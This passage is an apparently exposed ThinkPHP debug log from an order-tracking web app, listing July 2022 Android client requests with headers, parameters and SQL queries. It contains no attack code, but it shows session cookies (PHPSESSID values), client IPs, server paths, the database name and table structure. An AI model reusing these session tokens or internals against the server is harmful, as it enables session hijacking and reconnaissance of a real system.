47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020444s][吞吐率:48.91req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001101s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020233s][吞吐率:49.42req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001157s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:02+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.030779s][吞吐率:32.49req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000058s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001642s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001701s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000094s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:03+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021899s][吞吐率:45.66req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000061s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001305s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:03+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021924s][吞吐率:45.61req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000073s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001433s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:03+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018435s][吞吐率:54.24req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001049s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:03+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021483s][吞吐率:46.55req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001315s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:03+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020176s][吞吐率:49.56req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001223s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:03+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020774s][吞吐率:48.14req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001133s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:04+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.028097s][吞吐率:35.59req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000061s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001683s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:04+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021187s][吞吐率:47.20req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000052s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001205s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:05+08:00 ] 106.112.205.110 POST /api/office/officeorder/getV3OfficeOrderInfoById [ info ] 47.105.33.115:8081/api/office/officeorder/getV3OfficeOrderInfoById [运行时间:0.061640s][吞吐率:16.22req/s] [内存消耗:5,066.91kb] [文件加载:77] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001275s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.officeorder', 2 => 'getV3OfficeOrderInfoById', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'content-length' => '23', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'orderId' => '6158', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001600s ] [ info ] [ RUN ] app\api\controller\office\Officeorder->getV3OfficeOrderInfoById[ /alidata/www/gendan/application/api/controller/office/Officeorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000431s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001681s ] [ sql ] [ SQL ] SELECT * FROM `ot_orderinfo` WHERE `id` = 6158 LIMIT 1 [ RunTime:0.000549s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001270s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1128 LIMIT 1 [ RunTime:0.000399s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_guzhangduihua` [ RunTime:0.001603s ] [ sql ] [ SQL ] SELECT * FROM `ot_guzhangduihua` WHERE `orderinfo_id` = 6158 ORDER BY `createtime` DESC [ RunTime:0.000421s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001232s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountspayable` WHERE `orderinfo_id` = 6158 AND ( money>0 ) ORDER BY `createtime` DESC [ RunTime:0.000769s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderandmaterial` [ RunTime:0.001262s ] [ sql ] [ SQL ] SELECT * FROM `ot_orderandmaterial` WHERE `orderinfo_id` = 6158 [ RunTime:0.000329s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_material` [ RunTime:0.001145s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 522 LIMIT 1 [ RunTime:0.000391s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 550 LIMIT 1 [ RunTime:0.000345s ] [ sql ] [ SQL ] SELECT * FROM `ot_orderinfo` WHERE `pid` = 6158 ORDER BY `createtime` ASC [ RunTime:0.001455s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_purchaseorder` [ RunTime:0.001275s ] [ sql ] [ SQL ] SELECT * FROM `ot_purchaseorder` WHERE `orderinfo_id` = 6158 AND `order_type` = 4 ORDER BY `createtime` ASC [ RunTime:0.000455s ] --------------------------------------------------------------- [ 2022-07-20T17:15:05+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [运行时间:0.053315s][吞吐率:18.76req/s] [内存消耗:4,769.87kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001183s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001569s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000335s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001423s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000323s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001436s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001122s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308505>orderinfo.end_time desc,1658308505>orderinfo.end_time desc,1658308505-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.002419s ] --------------------------------------------------------------- [ 2022-07-20T17:15:05+08:00 ] 106.112.205.110 POST /api/techprocess/gettechprocess?productinfo_id=1128 [ info ] 47.105.33.115:8081/api/techprocess/gettechprocess?productinfo_id=1128 [运行时间:0.051816s][吞吐率:19.30req/s] [内存消耗:4,281.82kb] [文件加载:70] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001125s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'techprocess', 2 => 'gettechprocess', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'productinfo_id' => '1128', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001580s ] [ info ] [ RUN ] app\api\controller\Techprocess->gettechprocess[ /alidata/www/gendan/application/api/controller/Techprocess.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000342s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_techprocess` [ RunTime:0.009640s ] [ sql ] [ SQL ] SELECT * FROM `ot_techprocess` WHERE `productinfo_id` = 1128 ORDER BY `number` ASC [ RunTime:0.000931s ] --------------------------------------------------------------- [ 2022-07-20T17:15:05+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.030373s][吞吐率:32.92req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001292s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001732s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000092s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:05+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.027623s][吞吐率:36.20req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001167s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:05+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020829s][吞吐率:48.01req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001296s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:06+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.026681s][吞吐率:37.48req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001084s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001485s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000093s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:07+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=1&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=1&pageNum=10 [运行时间:0.054842s][吞吐率:18.23req/s] [内存消耗:4,769.86kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001053s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '1', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001679s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000504s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001542s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000359s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001581s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001112s ] [ sql ] [ SQL ] SELECT 